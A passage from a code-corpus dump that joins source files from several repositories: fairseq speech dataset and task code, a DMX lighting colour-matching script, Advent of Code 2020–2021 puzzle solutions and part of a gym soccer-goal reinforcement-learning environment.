# "negative_indices": negative_indices,
# "anchor_wordtypes": anchor_wordtypes,
# "nsentences": len(samples),
# "ntokens": sum(len(s["source"]) for s in samples),
# "target": target,
}
def collate_anchor_positive_negative_tensors(self, samples, feat_type):
"""
collate anchor positive and negative for a given feat in samples
feat_type could be:
"in" for inputs
"tgt" for targets
for example
"""
# get speech representation inputs, and place in lists
anchor_tensors = [s[f"anchor_{feat_type}"] for s in samples]
positive_tensors = [s[f"positive_{feat_type}"] for s in samples]
negative_tensors = [s[f"negative_{feat_type}"] for s in samples]
# zero pad according to the longest sequence among anchor, positive, or negative inputs.
# get timesteps of each input before performing zero padding for batching
# so that we know what the maximum length of the tensor should be
anchor_szs = torch.tensor([s[f"anchor_{feat_type}"].size(0) for s in samples], dtype=torch.long)
positive_szs = torch.tensor([s[f"positive_{feat_type}"].size(0) for s in samples], dtype=torch.long)
negative_szs = torch.tensor([s[f"negative_{feat_type}"].size(0) for s in samples], dtype=torch.long)
max_len = torch.max(torch.cat([anchor_szs, positive_szs, negative_szs])).item()
# create 0s tensor
b_sz = 3 * len(samples)
if samples[0][f"anchor_{feat_type}"].dim() == 1: # discrete
collated_tensor = torch.zeros(b_sz, max_len, dtype=torch.int)
elif samples[0][f"anchor_{feat_type}"].dim() == 2: # continuous
hid_dim = samples[0][f"anchor_{feat_type}"].size(1)
collated_tensor = torch.zeros(b_sz, max_len, hid_dim, dtype=torch.float)
else:
raise ValueError
# print("collated_tensor.size()", collated_tensor.size())
lengths = torch.zeros(b_sz, dtype=torch.int64)
# populate with data, group by anchors, positives, negatives
for i, anchor_t in enumerate(anchor_tensors):
# print("anchor", i)
collated_tensor[i], _ = zeropad_to_len(anchor_t, max_len)
lengths[i] = anchor_t.size(0)
for i, positive_t in enumerate(positive_tensors, start=len(samples)):
# print("positive", i)
collated_tensor[i], _ = zeropad_to_len(positive_t, max_len)
lengths[i] = positive_t.size(0)
for i, negative_t in enumerate(negative_tensors, start=2*len(samples)):
# print("negative", i)
collated_tensor[i], _ = zeropad_to_len(negative_t, max_len)
lengths[i] = negative_t.size(0)
return collated_tensor, lengths
def num_tokens(self, index):
"""Return the number of tokens in a sample. This value is used to
enforce ``--max-tokens`` during batching."""
return self.size(index)
def size(self, index):
"""Return an example's size as a float or tuple. This value is used when
filtering a dataset with ``--max-positions``."""
return self.sizes[index]
def ordered_indices(self):
"""Return an ordered list of indices. Batches will be constructed based
on this order."""
return np.arange(len(self), dtype=np.int64)
def save_wordtypes_to_disk(self, save_path):
"""Save wordtypes in this datasplit to disk"""
with open(save_path, 'w') as f:
f.write(','.join(self.wordtype2indices.keys()))
logger.info(f"Successfully saved wordtypes to '{save_path}'")
def test():
logging.basicConfig(format="[%(filename)s:%(lineno)s - %(funcName)20s() ] %(message)s")
logger.setLevel(logging.INFO)
# test dataset creation
data_path = '/home/s1785140/data/ljspeech_wav2vec2_reps/wav2vec2-large-960h/layer-15/word_level/'
dataset = WordAlignedAudioDataset(
data_path,
max_train_wordtypes=100,
max_train_examples_per_wordtype=5,
)
# for i in range(len(dataset)):
# print(dataset.index2wordtype(i))
def print_words_for_indices(indices):
print(", ".join(f"{j}:{dataset.index2wordtype(j)}" for j in indices))
# test retrieval of +ve and -ve indices
print_words_for_indices(dataset.get_positive_indices(anchor_index=0, num_examples=10))
print_words_for_indices(dataset.get_negative_indices(anchor_index=0, num_examples=10))
list_of_samples = []
# test __getitem__()
for i, sample in enumerate(dataset):
print(sample)
list_of_samples.append(sample)
if i > 5:
break
# test collater
collate_rv = dataset.collater(list_of_samples)
print(collate_rv['anchor_indices'])
if __name__ == '__main__':
"""
to test, run:
python /home/s1785140/fairseq/fairseq/data/audio/word_aligned_audio_dataset.py
"""
test()
```
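A minimal sketch of the anchor/positive/negative lookup that `__getitem__` relies on: positives share the anchor's wordtype, negatives come from any other wordtype. The wordtype map and indices below are invented for illustration.
```python
import random

wordtype2indices = {"cat": {0, 1, 2}, "dog": {3, 4}, "fish": {5}}
all_indices = set().union(*wordtype2indices.values())

def sample_triplet(anchor_index, wordtype):
    positives = wordtype2indices[wordtype] - {anchor_index}
    negatives = all_indices - wordtype2indices[wordtype]
    return anchor_index, random.choice(sorted(positives)), random.choice(sorted(negatives))

print(sample_triplet(0, "cat"))  # e.g. (0, 2, 4)
```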
#### File: fairseq/tasks/speech_audio_corrector.py
```python
import logging
import os
import os.path as op
import torch
import torch.nn.functional as F
import numpy as np
from fairseq.data.audio.speech_audio_corrector_dataset import SpeechAudioCorrectorDatasetCreator
from fairseq.tasks import register_task
from fairseq.tasks.text_to_speech import TextToSpeechTask
from fairseq.speech_generator import (
AutoRegressiveSpeechGenerator, NonAutoregressiveSpeechGenerator,
TeacherForcingAutoRegressiveSpeechGenerator, SACAutoRegressiveSpeechGenerator
)
from fairseq.data import Dictionary
from pathlib import Path
from fairseq.data.audio.speech_to_text_dataset import (
S2TDataConfig,
)
logging.basicConfig(
format='%(asctime)s | %(levelname)s | %(name)s | %(message)s',
datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO
)
logger = logging.getLogger(__name__)
try:
from tensorboardX import SummaryWriter
except ImportError:
logger.info("Please install tensorboardX: pip install tensorboardX")
SummaryWriter = None
#TODO add args from CLA
#TODO randomise_examples
@register_task('speech_audio_corrector')
class SpeechAudioCorrectorTask(TextToSpeechTask):
@classmethod
def add_args(cls, parser):
super(SpeechAudioCorrectorTask, cls).add_args(parser)
parser.add_argument("--randomise-examples", action="store_true",)
# parser.add_argument("--incl-external-speechreps", action="store_true",)
def __init__(self, args, src_dict):
super().__init__(args, src_dict)
self.args = args
# add symbols for SAC to dictionary
self.src_dict.add_symbol("<mask>")
K=100
for i in range(K):
# add to src_dict entries for hubert codes i.e. HUB0, HUB1, ..., HUB<k-1>
self.src_dict.add_symbol(f"HUB{i}")
# print entire dictionary should be graphemes + hubert codes
print("(symbol, index) mapping in dictionary for Speech Audio Corrector Training:")
print([(symbol, src_dict.index(symbol)) for symbol in src_dict.symbols])
def load_dataset(self, split, epoch=1, combine=False, **kwargs):
is_train_split = split.startswith('train')
pre_tokenizer = self.build_tokenizer(self.args)
bpe_tokenizer = self.build_bpe(self.args)
self.datasets[split] = SpeechAudioCorrectorDatasetCreator.from_tsv(
self.args,
self.args.data, self.data_cfg, split, self.src_dict,
pre_tokenizer, bpe_tokenizer, is_train_split=is_train_split,
epoch=epoch, seed=self.args.seed,
n_frames_per_step=self.args.n_frames_per_step,
speaker_to_id=self.speaker_to_id,
)
def build_generator(self, models, cfg, vocoder=None, **unused):
if vocoder is None:
vocoder = self.build_default_vocoder()
model = models[0]
if getattr(model, "NON_AUTOREGRESSIVE", False):
return NonAutoregressiveSpeechGenerator(
model, vocoder, self.data_cfg
)
else:
generator = SACAutoRegressiveSpeechGenerator
if getattr(cfg, "teacher_forcing", False):
generator = TeacherForcingAutoRegressiveSpeechGenerator
logger.info("Teacher forcing mode for generation")
return generator(
model, vocoder, self.data_cfg,
max_iter=self.args.max_target_positions,
eos_prob_threshold=self.args.eos_prob_threshold
)
``` |
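A plain-Python sketch of the vocabulary extension performed in `__init__` above: after the grapheme symbols, a `<mask>` token and K HuBERT code tokens each take the next free index. The grapheme list is a stand-in for the real source dictionary.
```python
symbols = ["a", "b", "c"]  # stand-in for the grapheme symbols
symbols.append("<mask>")
K = 100
symbols.extend(f"HUB{i}" for i in range(K))
index = {sym: i for i, sym in enumerate(symbols)}
print(index["<mask>"], index["HUB0"], index["HUB99"])  # -> 3 4 103
```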
{
"source": "jonolt/dmx-colormatch",
"score": 2
} |
#### File: python/coloralgorithm/coloralgorithm.py
```python
from fixture import FixtureRGB
import math
import time
import numpy as np
def rel_diff(cur, ref) -> float:
if ref == 0:
return cur
return (ref - cur) / ref
def get_max_index(array):
max_index = 0
for i in range(len(array)):
if array[i] > array[max_index]:
max_index = i
return max_index
def get_min_index(array):
min_index = 0
for i in range(len(array)):
if array[i] < array[min_index]:
min_index = i
return min_index
def sign(val):
return math.copysign(1, val)
def divide_array(array, divisor):
for i in range(len(array)):
array[i] = int(array[i] / divisor)
if __name__ == "__main__":
org_rgbc = [1508, 1147, 2873, 5526]
org_dmx = [200, 150, 210]
#org_rgbc = [3333,1186,705,5057]
#org_dmx = [255, 200, 0]
#org_rgbc=[1604,1828,1144, 4597]
#org_dmx=[200, 235, 85]
#org_rgbc = [75,1259,5331,6775]
#org_dmx = [0,0,255]
csvpaths = (
"../data/adj_megatripar_red.csv",
"../data/adj_megatripar_green.csv",
"../data/adj_megatripar_blue.csv",
)
f = FixtureRGB(csvpaths)
# ENTER
dmx = [0, 0, 0]
last_dif_rel = 0
dif_rel = 0
matrix = np.zeros((3, 3), float)
dmx_best = np.zeros((3,3), int)
dif_best = np.zeros(3, float)
index_ch = 0 # index var
index_base_ch = 0 #index abs
repetitions = 0
first_miss = True
initialized = False
updown = 5
# LOOP
for ref in range(3):
for var in range(3):
matrix[ref, var] = rel_diff(org_rgbc[var], org_rgbc[3])
def reset():
global index_ch
global index_base_ch
global repetitions
global first_miss
global updown
global dmx
global initialized
index_ch = 0
repetitions = 0
first_miss = True
initialized = False
updown = 5
dmx = [0, 0, 0]
dmx[index_base_ch] = 255
reset()
while True:
# skip base_ch
index_ch = index_ch%len(dmx)
if index_ch == index_base_ch :
index_ch += 1
continue
last_dif_rel = dif_rel
cur_abs_rgbc = f.in_out(dmx)
dif_rel = pow(rel_diff(cur_abs_rgbc[0], cur_abs_rgbc[3]) - matrix[1, 0], 2)
dif_rel += pow(rel_diff(cur_abs_rgbc[1], cur_abs_rgbc[3]) - matrix[2, 1], 2)
dif_rel += pow(rel_diff(cur_abs_rgbc[2], cur_abs_rgbc[3]) - matrix[0, 2], 2)
if not initialized:
initialized = True
last_dif_rel = dif_rel
last_dmx = dmx[index_ch]
print(
f"{repetitions} {index_base_ch} {index_ch} {last_dif_rel:07.4f} {dif_rel:07.4f} {first_miss} [{dmx[0]:03d},{dmx[1]:03d},{dmx[2]:03d}]",
end="\n",
)
if dif_rel > last_dif_rel:
dmx[index_ch] = last_dmx
if first_miss:
first_miss = False
updown = -updown
else:
first_miss = True
index_ch += 1
repetitions += 1
continue
last_dmx = dmx[index_ch]
dmx[index_ch] += updown
if dmx[index_ch] > 255:
dmx[index_ch] = 255
if first_miss:
first_miss = False
updown = -updown
else:
first_miss = True
index_ch += 1
repetitions += 1
elif dmx[index_ch] < 0:
dmx[index_ch] = 0
if first_miss:
first_miss = False
updown = -updown
else:
first_miss = True
index_ch += 1
repetitions += 1
if repetitions == 10:
updown = 1
if repetitions == 30:
dif_best[index_base_ch] = dif_rel
for i in range(len(dmx)):
dmx_best[index_base_ch, i] = dmx[i]
print(f"Mid Result ({index_base_ch}): {dmx_best[index_base_ch]} with {dif_best[index_base_ch]:07.4f} match")
index_base_ch += 1
if index_base_ch==len(dmx):
break
reset()
#input("Enter to continue")
best_max_ch = get_min_index(dif_best)
dmx_final = dmx_best[best_max_ch]
print(f"Final Result: {dmx_final} with {dif_best[best_max_ch]:07.4f} match")
# print(f"")
#time.sleep(0.2)
``` |
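The search loop above nudges one DMX channel at a time by a fixed step, keeps a move while the squared error shrinks, flips direction on the first miss and stops on the second. A toy single-channel version of that idea with an arbitrary target:
```python
def search_channel(value, target, step=5):
    best = value
    misses = 0
    while misses < 2:
        candidate = min(255, max(0, best + step))
        if (candidate - target) ** 2 < (best - target) ** 2:
            best = candidate  # the move improved the error, keep it
        else:
            step = -step      # first miss flips direction, second miss stops
            misses += 1
    return best

print(search_channel(0, 123))  # -> 125 with the default step of 5
```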
{
"source": "jonomango/advent-of-code-2020",
"score": 3
} |
#### File: advent-of-code-2020/Day 11/part1.py
```python
import copy
seats = []
with open("input.txt", "r") as file:
for line in file.readlines():
seats.append(line.replace("\n", ""))
def nearby_occupied(i, j):
occupied = 0
if i + 1 < len(seats) and seats[i + 1][j] == "#":
occupied += 1
if i - 1 >= 0 and seats[i - 1][j] == "#":
occupied += 1
if j + 1 < len(seats[i]) and seats[i][j + 1] == "#":
occupied += 1
if j - 1 >= 0 and seats[i][j - 1] == "#":
occupied += 1
if i + 1 < len(seats) and j + 1 < len(seats[i + 1]) and seats[i + 1][j + 1] == "#":
occupied += 1
if i - 1 >= 0 and j + 1 < len(seats[i - 1]) and seats[i - 1][j + 1] == "#":
occupied += 1
if i + 1 < len(seats) and j - 1 >= 0 and seats[i + 1][j - 1] == "#":
occupied += 1
if i - 1 >= 0 and j - 1 >= 0 and seats[i - 1][j - 1] == "#":
occupied += 1
return occupied
def occupy_seats():
new_seats = copy.deepcopy(seats)
changed = False
for i in range(len(seats)):
for j in range(len(seats[i])):
if seats[i][j] == "L" and nearby_occupied(i, j) == 0:
new_seats[i] = new_seats[i][:j] + "#" + new_seats[i][j + 1:]
changed = True
if seats[i][j] == "#" and nearby_occupied(i, j) >= 4:
new_seats[i] = new_seats[i][:j] + "L" + new_seats[i][j + 1:]
changed = True
return changed, new_seats
while True:
c, seats = occupy_seats()
if not c:
break
print(sum([sum([x == "#" for x in row]) for row in seats]))
```
#### File: advent-of-code-2020/Day 13/part2.py
```python
from functools import reduce
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
def modinv(a, m):
g, x, y = egcd(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return x % m
with open("input.txt", "r") as file:
_, busses = file.readlines()
busses = busses.split(",")
# https://brilliant.org/wiki/chinese-remainder-theorem/
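# Construction: a[i] = bus_id - offset (≡ -offset mod bus_id, the required residue) and
# n[i] = bus_id (the modulus). With N = prod(n), y_i = N / n_i and z_i = y_i^(-1) mod n_i,
# the CRT solution is sum(a_i * y_i * z_i) mod N.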
a, n = [], []
for i in range(len(busses)):
if busses[i] == "x":
continue
a.append(int(busses[i]) - i)
n.append(int(busses[i]))
N = reduce(lambda x, y: x * y, n, 1)
y = [N // x for x in n]
z = [modinv(i, m) for i, m in zip(y, n)]
print(sum([i * j * k for i, j, k in zip(a, y, z)]) % N)
```
#### File: advent-of-code-2020/Day 19/part2.py
```python
import math
import copy
from functools import reduce
def matches(line, rules, rule):
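# `rule` here is a single alternative such as '"a"' or '42 31'; the return value is the list
# of prefix lengths of `line` that this alternative can consume (an empty list means no match).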
# this is the base case
if "\"" in rule:
if len(line) > 0 and line[0] == rule[1]:
return [1]
else:
return []
# rule = ['1', '2']
rule = rule.split(" ")
# this stores the possible offsets from line[0:] that match
offsets = []
for i in range(len(rule)):
r = rule[i]
r = rules[r]
# first iteration, offsets is empty
if i == 0:
for s in r:
for m in matches(line, rules, s):
if m not in offsets:
offsets.append(m)
continue
new_offsets = []
for s in r:
for o in offsets:
for m in matches(line[o:], rules, s):
new_offsets.append(o + m)
offsets = new_offsets
return offsets
with open("input.txt", "r") as file:
rules, messages = file.read().split("\n\n")
# { '1': ['2 3', '3 2'] }
rules = { k: v.split(" | ") for k, v in [r.split(": ") for r in rules.split("\n")] }
rules['8'] = ['42', '42 8']
rules['11'] = ['42 31', '42 11 31']
#print("result:", matches(messages.split("\n")[0], rules, '1'))
print("solution =", sum([len(m) in matches(m, rules, '0') for m in messages.split("\n")]))
```
#### File: advent-of-code-2020/Day 20/part2.py
```python
import math
import copy
from functools import reduce
monster = [
" # ",
"# ## ## ###",
" # # # # # # ",
]
# flip an array of data over the x-axis (or y-axis)
def flip(data, xaxis):
if xaxis:
return data[::-1]
else:
return [row[::-1] for row in data]
# rotate an array of data clockwise
def rotate(data, r):
r %= 4
# 0 degrees: no rotation needed
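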
if r == 0:
return data
# 90 degrees
elif r == 1:
return ["".join(row[i] for row in data[::-1]) for i in range(len(data))]
# 180 degrees
elif r == 2:
return [row[::-1] for row in data[::-1]]
# 270 degrees
else:
return ["".join(row[-i - 1] for row in data) for i in range(len(data))]
# rotate and flip according to input
def transform(data, face1, face2, should_flip):
data = rotate(data, face1 - face2 + 2)
if should_flip:
data = flip(data, face1 % 2)
return data
# get the 4 borders of a square
def borders(data):
return [
data[0],
"".join(row[-1] for row in data),
data[-1][::-1],
"".join(row[0] for row in data[::-1]),
]
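# Note: the edges are listed clockwise — top left-to-right, right top-to-bottom,
# bottom right-to-left, left bottom-to-top — which is the ordering adjacent() and
# transform() rely on when matching tile faces.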
# returns a list of adjacent tiles
# (id, face1, face2, flip)
def adjacent(tiles, tid):
adj = []
data = tiles[tid]
for i, d in tiles.items():
# ignore ourself
if i == tid:
continue
for s1, b1 in enumerate(borders(data)):
for s2, b2 in enumerate(borders(d)):
# matches, but needs to flip
if b1 == b2:
adj.append((i, s1, s2, True))
# no need to flip
elif b1 == b2[::-1]:
adj.append((i, s1, s2, False))
return adj
# get a corner tile id
def corner(tiles):
for tid in tiles:
adj = adjacent(tiles, tid)
# corners
if len(adj) == 2:
# side length
side = int(math.sqrt(len(tiles)))
x, y = 0, 0
if 0 not in [i for _, i, _, _ in adj]:
y = side - 1
if 1 not in [i for _, i, _, _ in adj]:
x = side - 1
return tid, x, y
return None
# make a 2D array image
def form_image(tiles):
# side length
side = int(math.sqrt(len(tiles)))
# start processing from a corner
# (id, x, y)
to_process = [corner(tiles)]
# note: (x, y) coords are grid[y][x] and grid[0][0] is top left
grid = [[None for _ in range(side)] for _ in range(side)]
grid[to_process[0][2]][to_process[0][1]] = to_process[0][0]
for curr_id, curr_x, curr_y in to_process:
# process adjacent tiles
for adj_id, face1, face2, should_flip in adjacent(tiles, curr_id):
# already processed
if adj_id in [x for row in grid for x in row]:
continue
# transform the tile so that it actually fits
tiles[adj_id] = transform(tiles[adj_id], face1, face2, should_flip)
x, y = curr_x, curr_y
if face1 == 0:
y += 1
elif face1 == 1:
x += 1
elif face1 == 2:
y -= 1
else:
x -= 1
grid[y][x] = adj_id
to_process.append((adj_id, x, y))
image = []
tile_length = len(list(tiles.values())[0])
# at this point, grid is an array of properly placed ids
# and every tile in tiles is properly sorted
for row in grid:
for i in range(1, tile_length - 1):
image.append("")
for tid in row:
image[-1] += tiles[tid][-i - 1][1:-1]
return image
# check if this matches the monster
def matches(image, xoff, yoff):
# check if matches
for i in range(len(monster[0])):
for j in range(len(monster)):
# only the '#' cells of the monster pattern matter
if monster[j][i] != "#":
continue
if image[j + yoff][i + xoff] != "#":
return False
return True
# mark monsters in an image
def mark_monsters(image, inhabited):
for xoff in range(len(image) - len(monster[0])):
for yoff in range(len(image) - len(monster)):
if not matches(image, xoff, yoff):
continue
for i in range(len(monster[0])):
for j in range(len(monster)):
# only the '#' cells of the monster pattern matter
if monster[j][i] != "#":
continue
inhabited[(xoff + i, yoff + j)] = None
with open("input.txt", "r") as file:
tiles = {}
# iterate over every line in a file
for tile in file.read().split("\n\n"):
tile_id, data = tile.split(":\n")
# add to dict
tiles[int(tile_id[5:])] = data.split("\n")
image = form_image(tiles)
inhabited = {}
for _ in range(4):
image = rotate(image, 1)
mark_monsters(image, inhabited)
image = flip(image, True)
for _ in range(4):
image = rotate(image, 1)
mark_monsters(image, inhabited)
print("solution:", sum(row.count("#") for row in image) - len(inhabited))
```
#### File: advent-of-code-2020/Day 23/part1.py
```python
import math
import copy
from functools import reduce
def normalize(dest, cups):
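# wrap-around: if the destination label drops below the smallest cup label, jump to the
# largest one (relies on the module-level `picked` set inside the loop below; picked cups
# are skipped by the caller).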
if dest < min(cups + picked):
dest = max(cups + picked)
return dest
with open("input.txt", "r") as file:
cups = list(map(int, file.read().strip()))
count = 100
for _ in range(count):
picked = cups[1:4]
cups = cups[:1] + cups[4:]
dest = normalize(cups[0] - 1, cups)
while dest in picked:
dest = normalize(dest - 1, cups)
dest = cups.index(dest) + 1
cups = cups[:dest] + picked + cups[dest:]
cups = cups[1:] + cups[:1]
print("".join(map(str, (cups + cups)[cups.index(1) + 1:][:len(cups) - 1])))
```
#### File: advent-of-code-2020/Day 5/part2.py
```python
def bsp(start, instructions):
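# binary space partitioning: 'F'/'L' keep the lower half of [mn, mx], 'B'/'R' keep the upper half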
mn, mx = 0, start
for instr in instructions:
if instr == "F" or instr == "L":
mx = (mx - mn + 1) / 2 - 1 + mn
else:
mn += (mx - mn + 1) / 2
return int(mn)
seats = [False for x in range(128 * 8)]
with open("input.txt", "r") as file:
for line in file.readlines():
row, column = bsp(127, line[:7]), bsp(7, line[7:-1])
seats[row * 8 + column] = True
for i in range(128 * 8):
if not seats[i] and seats[i - 1] and seats[i + 1]:
print(i)
``` |
{
"source": "jonomango/advent-of-code-2021",
"score": 3
} |
#### File: advent-of-code-2021/Day 3/part2.py
```python
import math
import copy
from functools import reduce
arr = []
with open("input.txt", "r") as file:
# iterate over every line in a file
for line in file.read().strip().split("\n"):
arr.append(line)
def freq(arr):
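# per bit position, returns (#ones - #zeros): a value >= 0 means '1' is the most common bit
# (ties count as '1'), a negative value means '0' is the most common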
f = [0 for _ in range(len(arr[0]))]
for line in arr:
for i in range(len(line)):
if line[i] == '1':
f[i] += 1
elif line[i] == '0':
f[i] -= 1
return f
arr3 = arr.copy()
for i in range(len(arr[0])):
arr2 = arr3.copy()
arr3 = []
f = freq(arr2)
if f[i] >= 0:
for a in arr2:
if a[i] == '1':
arr3.append(a)
else:
for a in arr2:
if a[i] == '0':
arr3.append(a)
if len(arr3) == 1:
break
o = int(arr3[0], 2)
arr3 = arr.copy()
for i in range(len(arr[0])):
arr2 = arr3.copy()
arr3 = []
f = freq(arr2)
if f[i] < 0:
for a in arr2:
if a[i] == '1':
arr3.append(a)
else:
for a in arr2:
if a[i] == '0':
arr3.append(a)
if len(arr3) == 1:
break
c = int(arr3[0], 2)
print(o * c)
```
#### File: advent-of-code-2021/Day 6/part2.py
```python
import math
import copy
from functools import reduce
fish = [0 for _ in range(9)]
with open("input.txt", "r") as f:
for x in f.read().split(","):
fish[int(x)] += 1
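# fish[t] counts how many fish currently have internal timer t (0..8); simulating a day just
# rotates these buckets, so 256 days of growth needs only constant memory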
def simulate(f):
n = f[0]
f = f[1:]
f.append(n)
f[6] += n
return f
for i in range(256):
fish = simulate(fish)
print(sum(fish))
``` |
{
"source": "jonomon/gym-goal",
"score": 3
} |
#### File: gym_goal/envs/goal_env.py
```python
import numpy as np
import math
import gym
import pygame
from gym import spaces, error
from gym.utils import seeding
import sys
from .config import PLAYER_CONFIG, BALL_CONFIG, GOAL_AREA_LENGTH, GOAL_AREA_WIDTH, GOAL_WIDTH, GOAL_DEPTH, KICKABLE, \
INERTIA_MOMENT, MINPOWER, MAXPOWER, PITCH_LENGTH, PITCH_WIDTH, CATCHABLE, CATCH_PROBABILITY, SHIFT_VECTOR, \
SCALE_VECTOR, LOW_VECTOR, HIGH_VECTOR
from .util import bound, bound_vector, angle_position, angle_between, angle_difference, angle_close, norm_angle, \
vector_to_tuple
# actions
KICK = "kick"
DASH = "dash"
TURN = "turn"
TO_BALL = "toball"
SHOOT_GOAL = "shootgoal"
TURN_BALL = "turnball"
DRIBBLE = "dribble"
KICK_TO = "kickto"
ACTION_LOOKUP = {
0: KICK_TO,
1: SHOOT_GOAL,
2: SHOOT_GOAL,
}
# field bounds seem to be 0, PITCH_LENGTH / 2, -PITCH_WIDTH / 2, PITCH_WIDTH / 2
PARAMETERS_MIN = [
np.array([0, -PITCH_WIDTH / 2]), # -15
np.array([-GOAL_WIDTH / 2]), # -7.01
np.array([-GOAL_WIDTH / 2]), # -7.01
]
PARAMETERS_MAX = [
np.array([PITCH_LENGTH, PITCH_WIDTH / 2]), # 40, 15
np.array([GOAL_WIDTH / 2]), # 7.01
np.array([GOAL_WIDTH / 2]), # 7.01
]
def norm(vec2d):
# from numpy.linalg import norm
# faster to use custom norm because we know the vectors are always 2D
assert len(vec2d) == 2
return math.sqrt(vec2d[0]*vec2d[0] + vec2d[1]*vec2d[1])
class GoalEnv(gym.Env):
# metadata = {'render.modes': ['human', 'rgb_array']}
metadata = {'render.modes': ['human']} # cannot use rgb_array at the moment due to frame skip between actions
_VISUALISER_SCALE_FACTOR = 20
_VISUALISER_DELAY = 120 # fps
def __init__(self):
""" The entities are set up and added to a space. """
self.np_random = None
self.entities = []
self.player = None
self.ball = None
self.goalie = None
self.states = []
self.render_states = []
self.window = None
self.time = 0
self.max_time = 100
num_actions = len(ACTION_LOOKUP)
self.action_space = spaces.Tuple((
spaces.Discrete(num_actions), # actions
spaces.Tuple( # parameters
tuple(spaces.Box(PARAMETERS_MIN[i], PARAMETERS_MAX[i], dtype=np.float32) for i in range(num_actions))
)
))
self.observation_space = spaces.Tuple((
# spaces.Box(low=0., high=1., shape=self.get_state().shape, dtype=np.float32), # scaled states
spaces.Box(low=LOW_VECTOR, high=HIGH_VECTOR, dtype=np.float32), # unscaled states
spaces.Discrete(200), # internal time steps (200 limit is an estimate)
))
self.seed()
def step(self, action):
"""
Take a full, stabilised update.
Parameters
----------
action (ndarray) :
Returns
-------
ob, reward, episode_over, info : tuple
ob (object) :
reward (float) :
terminal (bool) :
info (dict) :
"""
act_index = action[0]
act = ACTION_LOOKUP[act_index]
param = action[1][act_index]
param = np.clip(param, PARAMETERS_MIN[act_index], PARAMETERS_MAX[act_index])
steps = 0
self.time += 1
if self.time == self.max_time:
reward = -self.ball.goal_distance()
end_episode = True
state = self.get_state()
return (state, 0), reward, end_episode, {}
end_episode = False
run = True
reward = 0.
while run:
steps += 1
reward, end_episode = self._update(act, param)
run = not end_episode
if run:
run = not self.player.can_kick(self.ball)
if act == DRIBBLE:
run = not self.ball.close_to(param) or run
elif act == KICK_TO:
run = norm(self.ball.velocity) > 0.1 or run
elif act == TURN_BALL:
theta = angle_between(self.player.position, self.ball.position)
run = not angle_close(theta, param[0]) or run
elif act == SHOOT_GOAL:
run = not end_episode
else:
run = False
state = self.get_state()
return (state, steps), reward, end_episode, {}
def _update(self, act, param):
"""
Performs a single transition with the given action,
returns the reward and terminal status.
"""
self.states.append([
self.player.position.copy(),
self.player.orientation,
self.goalie.position.copy(),
self.goalie.orientation,
self.ball.position.copy()])
self.render_states.append(self.states[-1])
self._perform_action(act, param, self.player)
self.goalie.move(self.ball, self.player)
for entity in self.entities:
entity.update()
self._resolve_collisions()
return self._terminal_check()
def reset(self):
# TODO: implement reset for each entity to avoid creating new objects and reduce duplicate code
initial_player = np.array((0, self.np_random.uniform(-PITCH_WIDTH / 2, PITCH_WIDTH / 2)))
angle = angle_between(initial_player, np.array((PITCH_LENGTH / 2, 0)))
self.player = Player(initial_player, angle)
MACHINE_EPSILON = 1e-12 # ensure always kickable on first state
# fixes seeded runs changing between machines due to minor precision differences,
# specifically from angle_position due to cos and sin approximations
initial_ball = initial_player + (KICKABLE - MACHINE_EPSILON) * angle_position(angle)
#initial_ball = initial_player + KICKABLE * angle_position(angle)
self.ball = Ball(initial_ball)
initial_goalie = self._keeper_target(initial_ball)
angle2 = angle_between(initial_goalie, initial_ball)
self.goalie = Goalie(initial_goalie, angle2)
self.entities = [self.player, self.goalie, self.ball]
self._update_entity_seeds()
self.states = []
self.render_states = []
self.time = 0
self.states.append([
self.player.position.copy(),
self.player.orientation,
self.goalie.position.copy(),
self.goalie.orientation,
self.ball.position.copy()])
self.render_states.append(self.states[-1])
return self.get_state(), 0
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
self.reset()
self._update_entity_seeds()
return [seed]
def _update_entity_seeds(self):
# will be empty at initialisation, call again after creating all entities
for entity in self.entities:
entity.np_random = self.np_random
@staticmethod
def _keeper_line(ball):
""" Finds the line the keeper wants to stay to. """
grad = -ball[1] / (PITCH_LENGTH / 2 - ball[0])
yint = ball[1] - grad * ball[0]
return grad, yint
def _keeper_target(self, ball):
""" Target the keeper wants to move towards. """
grad, yint = self._keeper_line(ball)
if ball[0] < PITCH_LENGTH / 2 - GOAL_AREA_LENGTH:
xval = ball[0]
else:
if ball[1] < -GOAL_AREA_WIDTH / 2:
xval = (-GOAL_AREA_WIDTH / 2 - yint) / grad
else:
xval = (GOAL_AREA_WIDTH / 2 - yint) / grad
xval = bound(xval, PITCH_LENGTH / 2 - GOAL_AREA_LENGTH, PITCH_LENGTH / 2)
yval = bound(grad * xval + yint, -GOAL_AREA_WIDTH / 2, GOAL_AREA_WIDTH / 2)
return np.array((xval, yval))
def get_state(self):
""" Returns the representation of the current state. """
state = np.concatenate((
self.player.position,
self.player.velocity,
[self.player.orientation],
self.goalie.position,
self.goalie.velocity,
[self.goalie.orientation],
self.ball.position,
self.ball.velocity))
#return self.scale_state(state)
return state
def _load_from_state(self, state):
assert len(state) == len(self.get_state())
self.player.position[0] = state[0]
self.player.position[1] = state[1]
self.player.velocity[0] = state[2]
self.player.velocity[1] = state[3]
self.player.orientation = state[4]
self.goalie.position[0] = state[5]
self.goalie.position[1] = state[6]
self.goalie.velocity[0] = state[7]
self.goalie.velocity[1] = state[8]
self.goalie.orientation = state[9]
self.ball.position[0] = state[10]
self.ball.position[1] = state[11]
self.ball.velocity[0] = state[12]
self.ball.velocity[1] = state[13]
def _perform_action(self, act, parameters, agent):
""" Applies for selected action for the given agent. """
if act == KICK:
agent.kick_ball(self.ball, parameters[0], parameters[1])
elif act == DASH:
agent.dash(parameters[0])
elif act == TURN:
agent.turn(parameters[0])
elif act == TO_BALL:
agent.to_ball(self.ball)
elif act == SHOOT_GOAL:
agent.shoot_goal(self.ball, parameters[0])
elif act == TURN_BALL:
agent.turn_ball(self.ball, parameters[0])
elif act == DRIBBLE:
agent.dribble(self.ball, parameters)
elif act == KICK_TO:
agent.kick_to(self.ball, parameters[0])
else:
raise error.InvalidAction("Action not recognised: ", act)
def _resolve_collisions(self):
""" Shift apart all colliding entities with one pass. """
for index, entity1 in enumerate(self.entities):
for entity2 in self.entities[index + 1:]:
if entity1.colliding(entity2):
entity1.decollide(entity2)
def _terminal_check(self):
""" Determines if the episode is ended, and the reward. """
if self.ball.in_net():
end_episode = True
reward = 50
